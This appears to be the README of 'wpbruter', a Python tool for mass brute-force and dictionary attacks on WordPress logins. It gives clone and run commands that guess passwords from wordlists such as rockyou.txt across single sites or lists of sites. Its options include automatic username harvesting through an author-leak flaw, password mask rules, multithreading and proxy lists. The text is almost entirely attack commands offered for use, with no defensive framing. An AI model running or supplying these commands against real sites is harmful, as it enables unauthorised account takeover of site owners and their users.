Tool for Massive mask and dictionary attacks, auto recognize, proxy, threads and other cool features for Word Press
git clone https://github.com/Naster17/wpbruter/
Auto attack users on site using wordlist
python main.py --target https://site.com --wpassword rockyou.txt --auto
Tries the password and users on all sites in the list
python main.py --wtarget sites.txt --user admin --password admin123 --thread 5
Uses user and password dictionaries on one site
python main.py --target site.com --wusers users.txt --wpassword passwords.txt
Mass bruteforce
python main.py --wtarget sites.txt --wusers users.txt --wpassword passwords.txt
- Can exploit "Username leakage vulnerability"
- Written in pure Python, no dependencies need to be installed
- Multithreaded
- A large number of attack combinations
--auto Automatically recognizes available usernames by exploiting vulnerabilities in wp (author leak)
--cheatsheet Help with mask attacks
LOWER: USER -> user
TITLE: user -> User
REVERSE: user -> resu
UPPER-REVERSE: user -> RESU
LOWER-REVERSE: USER -> resu
TITLE-REVERSE: user -> resU
MINUS[1-9]: 1: user -> ser
2: user -> er
3: user -> r
...
--target URL to attack site example: https://mysite.com
--wtarget wordlist file with list of URLs
--mask Mask rule for passwords use --cheatsheet for more info
--site-mask Mask rule for site names use --cheatsheet for more info
--username Static one username example: admin
--wusers wordlist with user names
--password Static password example: admin123
--wpassword wordlist with passwords
--timeout timed out for requests in sec example: 1
--thread numbers of threading example: 4
--proxy example: 127.0.0.1:8080 auto detect proxy type (http, https supports)
--proxy-list wordlist with proxy